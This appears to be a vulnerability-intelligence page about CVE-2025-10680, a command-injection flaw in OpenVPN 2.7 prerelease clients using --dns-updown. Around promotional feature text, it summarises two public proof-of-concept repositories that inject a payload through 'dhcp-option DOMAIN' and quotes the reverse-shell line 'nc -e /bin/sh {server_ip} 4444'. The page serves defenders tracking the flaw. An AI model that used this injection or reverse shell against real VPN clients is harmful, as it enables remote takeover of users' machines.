CVE-2025-10680 affects OpenVPN versions 2.7_alpha1 through 2.7_beta1 on POSIX-based platforms. The vulnerability allows a remote authenticated VPN server to inject shell commands via DNS-related variables when the --dns-updown feature is enabled. The issue is consistent with improper neutralization of special elements in OS command construction, where externally influenced DNS values are passed into shell-executed up/down handling logic without sufficient sanitization. Successful exploitation depends on the client connecting to a malicious or compromised authenticated server and using DNS update scripting through --dns-updown.
Mallory correlates every CVE against your assets, your vendors, and active adversary campaigns. Know which vulnerabilities matter for you, not just which ones are loud.
What it means. What to do now. Patch path, mitigations, and the assume-compromise checklist.
What an attacker gets, and what they’ve been doing with it.
If you can’t patch tonight, do this now.
Patch, then assume compromise.
2 valid exploits after Mallory filtered fakes, detection scripts, and README-only repos.
This repository contains a working proof-of-concept (PoC) exploit for CVE-2025-10680, a critical remote code execution (RCE) vulnerability in OpenVPN versions 2.7_alpha1 through 2.7_beta1 on POSIX systems. The exploit leverages a command injection flaw in the handling of DHCP/DNS options when the client is configured with the --dns-updown hook. The repository consists of two files: a Python exploit script (CVE-2025-10680.py) and a detailed README.md. The Python script acts as a malicious OpenVPN server. It generates a temporary OpenVPN server configuration file that injects a malicious payload into the 'dhcp-option DOMAIN' parameter. This payload, when processed by a vulnerable client, causes the client to execute a reverse shell command ('nc -e /bin/sh {server_ip} 4444') back to the attacker's server. The script also starts a netcat listener on TCP port 4444 to receive the shell. The README.md provides comprehensive background, setup instructions, and mitigation advice. It details the affected OpenVPN versions, the attack scenario, and the expected outcome (a root shell on the client). The exploit is operational and demonstrates the vulnerability end-to-end, requiring only standard Python libraries and netcat. No fake or destructive code is present; the exploit is a real, working PoC for the described vulnerability.
This repository provides a working proof-of-concept (PoC) exploit for CVE-2025-10680, a command injection vulnerability in OpenVPN (versions 2.7_alpha1 to 2.7_beta1) affecting POSIX systems. The exploit targets clients that connect to a malicious OpenVPN server and use the --dns-updown hook, which is vulnerable to crafted DHCP/DNS options. The main exploit script (CVE-2025-10680.py) is a Python program that generates a malicious OpenVPN server configuration, injecting a payload into the 'dhcp-option DOMAIN' directive. This payload causes the vulnerable client to execute a reverse shell command (using netcat) back to the attacker's server on TCP port 4444. The script also starts a netcat listener to catch the shell. The repository consists of the exploit script and a detailed README.md, which explains the vulnerability, affected versions, attack scenario, mitigation steps, and usage instructions. The exploit is self-contained, requiring only Python 3 and netcat on the server. No hardcoded IP addresses or domains are present, but the exploit dynamically uses the attacker's server IP as specified at runtime. The repository is a functional PoC and not a weaponized or framework-based exploit.
5 sources tracked across advisories and community write-ups. News coverage will land here when it surfaces.
No news coverage yet. Advisories and community discussion only.
Query your assets running an affected version, and investigate the blast radius.
Every observed campaign linking this CVE to a named adversary.
Malware families riding this exploit, with evidence and IOCs.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Cross-references every affected SKU, including bundled OEM variants.
Community discussion across Reddit, Mastodon, and other social sources.